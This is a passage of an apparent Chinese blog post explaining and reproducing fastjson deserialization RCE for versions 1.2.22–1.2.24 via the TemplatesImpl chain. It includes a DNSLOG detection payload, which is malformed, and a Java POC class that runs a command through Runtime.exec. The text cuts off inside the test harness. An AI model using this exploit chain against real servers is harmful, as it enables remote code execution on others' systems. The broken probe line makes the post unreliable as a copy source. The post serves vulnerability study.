fastjson反序列化漏洞各版本漏洞复现以及原理分析

本文深入探讨FastJSON框架的远程代码执行(RCE)漏洞,包括漏洞触发机制、利用链分析及环境搭建。从JSON解析异常到DNSLOG判断,详细解析了1.2.22~1.2.24版本中com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类的利用方式。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

前言:

如何判断后端是否采用了fastjson框架:

一方面是通过json解析异常抛出,另一方面可以通过DNSLOG判断:

poc:

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

 

0x00 环境快速搭建

maven仓库https://mvnrepository.com/artifact/com.alibaba/fastjson,每个版本都有

直接导入对应漏洞版本即可

0x01 1.2.22~1.2.24

参考廖师傅的文章,写的比较好,点这里,传送门

利用链:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl

POC.test

package com.test.fast;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class POC extends AbstractTranslet {
    public POC() throws IOException {
        Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public static void main(String[] args) throws Exception {
        new POC();
    }
}

验证:

package com.test.fast;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.io.IOUtils;

public class test {
    public test() {
    }

    public static void main(String[] args) {
 

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值